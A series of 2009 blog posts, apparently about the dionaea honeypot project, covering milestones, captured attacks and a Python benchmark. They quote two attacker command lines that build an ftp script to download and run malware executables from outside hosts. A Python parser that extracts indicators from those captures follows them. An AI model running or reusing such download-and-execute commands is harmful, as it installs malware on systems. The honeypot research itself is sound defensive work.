Iteolih: Miles and More

11 Aug 2009 Markus Koetter iteolih

We got a new milestone due:

10.08.2009

  • thread-pool works

  • stream recording works

  • shellcode detection using libemu works

  • shellcode emulation using libemu works

  • compiles on Linux and OpenBSD

An exploit taken from a public repository, run against the software, is detected and emulated.

To shorten things: basically all required points are met with the current svn.

So, given the time we just saved, some words about how it works.

The core functionality in dionaea is written in C, but Python is embedded as the scripting language, and the required parts of the C API are exported to the embedded Python using Cython bindings.

Iteolih: malicious ftp services

26 Jul 2009 Markus Koetter iteolih

Yesterday, I got an incomplete, but successful, attack on my honeypot; the attacker's remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the part required to download the malware to the remote host was incomplete, I got curious and wanted a copy.

I did not expect downloading the malware to be a problem, as all the required information was available, including host, credentials and filename. But since the ftp service embedded in the malware is rather special, it was a problem.
The ftp service is designed to work with the Windows ftp client; the Windows ftp client only supports active ftp, and active ftp does not work behind NAT if the ftp service is not listening on the default port 21. Apart from that, the ftp service may fail on 6% of all ports.

Iteolih: If you can't touch it ...

21 Jul 2009 Markus Koetter ftp iteolih

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism on first sight, they use(d) a domain.
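Both captures above (the incomplete WinExec string from the 26 Jul post and the complete one here) follow the same cmd.exe pattern: a sequence of echo lines redirected into a script file, then ftp -n -s:file, then the downloaded binary. The following is an added example, not dionaea's own code or the author's, of how a honeypot or an incident responder can turn such a command line into structured indicators (server, port, credentials, requested files, whether the script is actually executed). It is a regex-based parser of the echo/redirect pattern; the two sample inputs are the captures quoted on this page, and the flag for the active-ftp/NAT problem simply encodes the observation from the 26 Jul post that the Windows client only does active mode, which fails behind NAT when the server is not on port 21.

```python
import re
from dataclasses import dataclass, field


@dataclass
class FtpDropper:
    """Indicators recovered from an 'echo ... > script & ftp -s:script' command line."""
    host: str = ""
    port: int = 21
    user: str = ""
    password: str = ""
    files: list = field(default_factory=list)   # file names requested with 'get'
    script_file: str = ""                       # name of the ftp script being built
    complete: bool = False                      # True only if 'ftp -s:<script_file>' is present
    executed: str = ""                          # downloaded file that is run afterwards

    @property
    def active_ftp_nat_issue(self) -> bool:
        # Windows ftp.exe speaks active ftp only; per the 26 Jul post that breaks
        # behind NAT whenever the service is not on port 21 (observation from the page).
        return self.port != 21


# Matches one "echo <ftp command> > file" or ">> file" segment of the cmd line.
_ECHO_RE = re.compile(r'\becho\s+(.*?)\s*>{1,2}\s*(\S+)$')
# Matches the ftp invocation that replays the script: "ftp -n -s:file".
_FTP_RE = re.compile(r'\bftp\b.*-s:(\S+)')


def unwrap_winexec(s: str) -> str:
    """Return the command string inside WinExec("..."), or s unchanged."""
    m = re.search(r'WinExec\(\s*"(.*)"\s*\)', s)
    return m.group(1) if m else s


def parse_ftp_dropper(cmdline: str) -> FtpDropper:
    drop = FtpDropper()
    # cmd.exe chains the individual commands with '&'; split and inspect each one.
    for seg in (p.strip() for p in unwrap_winexec(cmdline).split("&")):
        m = _ECHO_RE.search(seg)
        if m:
            words = m.group(1).split()
            drop.script_file = m.group(2)
            if not words:
                continue
            verb = words[0].lower()
            if verb == "open" and len(words) >= 2:
                drop.host = words[1]
                drop.port = int(words[2]) if len(words) >= 3 and words[2].isdigit() else 21
            elif verb == "user":
                drop.user = words[1] if len(words) >= 2 else ""
                drop.password = words[2] if len(words) >= 3 else ""
            elif verb == "get" and len(words) >= 2:
                drop.files.append(words[1])
            continue
        m = _FTP_RE.search(seg)
        if m and m.group(1) == drop.script_file:
            drop.complete = True
            continue
        if seg in drop.files:
            drop.executed = seg          # bare file name after the ftp call: it gets run
    return drop


# The two captures quoted in the posts above.
CAPTURE_INCOMPLETE = ('WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o '
                      '&echo get msq16.exe >> o")')
CAPTURE_COMPLETE = ('cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i '
                    '&echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe')

if __name__ == "__main__":
    for cap in (CAPTURE_INCOMPLETE, CAPTURE_COMPLETE):
        d = parse_ftp_dropper(cap)
        print(f"{d.host}:{d.port} user={d.user!r} pass={d.password!r} files={d.files} "
              f"complete={d.complete} executed={d.executed!r} nat_issue={d.active_ftp_nat_issue}")
```

On the first capture the parser reports the server and credentials but complete=False, which is exactly the "incomplete, but successful" situation the 26 Jul post describes; on the second it reports complete=True and the executed file name. Both show active_ftp_nat_issue=True because neither server listens on port 21.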

Iteolih: Is this worth your time?

05 Jun 2009 Markus Koetter iteolih

Hello,

due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as a unique abbreviation. Things are rolling for the project: writing code has started, and a basic homepage with instructions on how to compile and use it was created.

I even had the plan to write about it once or twice: finish something in the code, then write about it. When I was done with the code, I got the idea that writing about it was not worth your time.

Iteolih: Python Benchmark

24 May 2009 Markus Koetter iteolih python

As the plan is to embed Python as the scripting language in the honeypot, I ran a benchmark on a test suite. The 'test suite' is a C core which accepts connections and lets Python deal with the input. The protocol used for benchmarking is HTTP; the service serves a non-static HTML page.

I tested:

    • 2.6.2 (release26-maint, Apr 19 2009, 02:15:38)
    • 3.0.1+ (r301:69556, Apr 15 2009, 17:22:45)
    • 3.1a1+ (py3k, Mar 30 2009, 02:02:26)

To benchmark, I ran the Apache benchmark tool ab:

ab -n 100000 -c 15 http://localhost:8080/bar